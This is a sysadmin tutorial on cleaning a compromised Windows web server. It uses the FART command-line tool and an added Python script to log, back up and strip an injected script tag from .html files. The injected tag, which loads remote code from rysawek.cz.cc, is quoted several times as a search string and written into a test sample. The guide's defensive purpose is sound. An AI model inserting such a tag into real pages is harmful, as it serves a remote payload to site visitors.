FART (Find And Replace Text) is a command-line utility for Windows, an improved take on the well-known 'grep' command, with advanced features such as case adaptation of the replace string, find (and replace) in filenames, and automatic CVS edit. You can download it from Sourceforge and integrate it into your Windows environment.
Why We Need This?
For me, the Windows Server 2008 R2 search tool is not really good; it's hard for me to find/replace some text in all files in a certain directory recursively. Since I have experience in managing Linux boxes (using the command line), it is really convenient to have something command-line based to do this for you.
Let's say something goes wrong with your website and it gets injected, similar to this post http://blog.secaserver.com/2011/07/remove-specific-string-in-text-files/, but on a Windows server; then this is what you need.
Here is my environment:
OS: Windows 2008 R2 64bit
Infected files: All .html files under this directory
Infected code: “<script src=http://rysawek.cz.cc/web/fol/download.php ></script>”
1. Download the application from Sourceforge, http://sourceforge.net/projects/fart-it/
2. Extract the zip file somewhere and you will see there is one file inside called fart.exe. Move or copy it to C:\Windows\system32.
3. Fart.exe should be available in your Windows environment now. You can verify this by opening a command prompt and running the following command. You should see something like below:
    C:\Users\Administrator>fart
    Find And Replace Text v1.99b by Lionello Lunesu

    Usage: FART [options] [--] <wildcard>[,...] [find_string] [replace_string]

    Options:
     -h, --help          Show this help message (ignores other options)
     -q, --quiet         Suppress output to stdio / stderr
     -V, --verbose       Show more information
     -r, --recursive     Process sub-folders recursively
     -c, --count         Only show filenames, match counts and totals
     -i, --ignore-case   Case insensitive text comparison
     -v, --invert        Print lines NOT containing the find string
     -n, --line-number   Print line number before each line (1-based)
     -w, --word          Match whole word (uses C syntax, like grep)
     -f, --filename      Find (and replace) filename instead of contents
     -B, --binary        Also search (and replace) in binary files (CAUTION)
     -C, --c-style       Allow C-style extended characters (\xFF\0\t\n\r\\ etc.)
         --cvs           Skip cvs dirs; execute "cvs edit" before changing files
         --svn           Skip svn dirs
         --remove        Remove all occurences of the find_string
     -a, --adapt         Adapt the case of replace_string to found string
     -b, --backup        Make a backup of each changed file
     -p, --preview       Do not change the files but print the changes
4. So in this case, I want to delete the injected text inside my .html files. Before we delete the string, it's good to have the list of infected files in a text file so you have proof and a log. I will save the list as infected.txt on the C partition. I will run the following commands:
    rem cmd.exe only treats double quotes as quoting characters, so the search string is double-quoted
    cd C:\user1\public_html
    fart -r -i -c *.html "src=http://rysawek.cz.cc/web/fol/download.php" > C:\infected.txt
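5. Once you have the list of infected files, let's remove the injected code. There are 2 ways: either you delete the whole line as in example 1, or you replace the string with 'nothing', meaning we do not specify any replace value, so it removes the string without affecting the whole line, as in example 2. The -p (--preview) and -b (--backup) options from the usage listing above let you print the changes without touching the files, or keep a backup of each changed file.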
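Example 1:

    cd C:\user1\public_html
    fart -r -i -C --remove *.html "src=http://rysawek.cz.cc/web/fol/download.php"

Example 2:

    rem --remove deletes every occurrence of the search string; double quotes keep cmd.exe from reading < and > as redirection
    cd C:\user1\public_html
    fart -r -i --remove *.html "<script src=http://rysawek.cz.cc/web/fol/download.php ></script>"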
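
Steps 4 and 5 as one script, for hosts where fart.exe cannot be installed. This is an added example in Python, not part of FART or of the original post. It logs a SHA-256 of each infected file before touching it and keeps an untouched copy. The function name clean, the backup directory layout and the tolerance for varying whitespace inside the tag are assumptions of this example.

```python
import hashlib
import re
import shutil
from pathlib import Path

# Injected tag quoted on this page. Matching is case-insensitive (like fart -i);
# tolerating varying whitespace inside the tag is an assumption of this example.
INJECTED = re.compile(
    rb"<script\s+src=http://rysawek\.cz\.cc/web/fol/download\.php\s*>\s*</script>",
    re.IGNORECASE,
)


def clean(root, log_path, backup_dir, dry_run=True):
    """Log every infected *.html under root; unless dry_run, back up and strip the tag.

    Returns a list of (path, sha256_of_original, match_count).
    """
    root = Path(root)
    findings = []
    with open(log_path, "w", encoding="utf-8") as log:
        for path in sorted(root.rglob("*.html")):
            data = path.read_bytes()  # bytes, so encoding and line endings survive
            cleaned, count = INJECTED.subn(b"", data)
            if not count:
                continue
            digest = hashlib.sha256(data).hexdigest()
            log.write(f"{digest}  {count}  {path}\n")
            findings.append((path, digest, count))
            if dry_run:
                continue
            # Evidence copy; backup_dir is assumed to sit outside the web root.
            dest = Path(backup_dir) / path.relative_to(root)
            dest.parent.mkdir(parents=True, exist_ok=True)
            shutil.copy2(path, dest)
            path.write_bytes(cleaned)
    return findings


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:  # constructed sample tree
        page = Path(tmp, "public_html", "index.html")
        page.parent.mkdir()
        page.write_bytes(b"<html>hi<script src=http://rysawek.cz.cc/web/fol/"
                         b"download.php ></script></html>")
        print(clean(page.parent, Path(tmp, "infected.txt"),
                    Path(tmp, "evidence"), dry_run=False))
        print(page.read_bytes())
```

Run it with dry_run=True first: that writes the log without changing any file, which matches step 4.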